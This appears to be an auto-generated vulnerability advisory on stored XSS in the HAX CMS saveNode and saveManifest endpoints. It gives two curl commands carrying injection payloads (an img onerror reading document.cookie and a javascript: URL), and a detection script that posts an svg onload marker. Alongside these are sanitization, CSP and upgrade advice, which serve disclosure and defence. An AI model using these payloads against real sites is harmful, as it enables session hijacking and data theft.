How the CVE Works
The vulnerability arises due to insufficient input sanitization in HAX CMS’s `saveNode` and `saveManifest` endpoints. These endpoints accept user-supplied data and store it within the site’s JSON schema without proper validation. When the stored content is rendered, malicious JavaScript embedded in HTML tags (excluding `<script>`) executes in the victim’s browser. Attackers exploit this by injecting payloads via the site editor’s “View Source” or the settings editor’s URL field. Since the application fails to escape event handlers (e.g., `onerror`, `onload`) or other XSS vectors, authenticated attackers can hijack sessions or exfiltrate sensitive data.
DailyCVE Form
Platform: HAX CMS
Version: <1.12.0
Vulnerability: Stored XSS
Severity: Critical
Date: 2023-10-15
Prediction: Patch by 2023-11-20
What Undercode Say:
Analytics
- Attack Vector: Authenticated user abuse
- Exploitability: Low complexity
- CVSS Score: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Exploit Commands
1. saveNode XSS:
```bash
curl -X POST 'https://<site>/<user>/system/api/saveNode' -d '{"html":"<img src=x onerror=alert(document.cookie)>"}'
```
2. saveManifest XSS:
```bash
curl -X POST 'https://<site>/<user>/system/api/saveManifest' -d '{"theme":{"url":"javascript:alert(1)"}}'
```
Mitigation Code
1. Input Sanitization (Node.js):
```js
const sanitizeHtml = require('sanitize-html');
// Empty allow-lists: every tag and attribute is stripped, only text content survives.
const clean = sanitizeHtml(userInput, { allowedTags: [], allowedAttributes: {} });
```
2. CSP Header:
```nginx
# script-src must not contain 'unsafe-inline' or 'unsafe-eval', otherwise inline on* handlers still execute.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'";
```
Detection Script
```python
import requests

def check_xss(url):
    """Submit a marker payload and report whether it comes back unescaped."""
    payload = "<svg/onload=confirm(1)>"
    r = requests.post(url, json={"html": payload}, timeout=10)
    return payload in r.text
```
Remediation Steps
1. Upgrade to HAX CMS >=1.12.0.
2. Disable inline event handlers via CSP.
3. Audit user-generated content for `on*` event-handler attributes (e.g., `onerror`, `onload`).
References
Reported By: github.com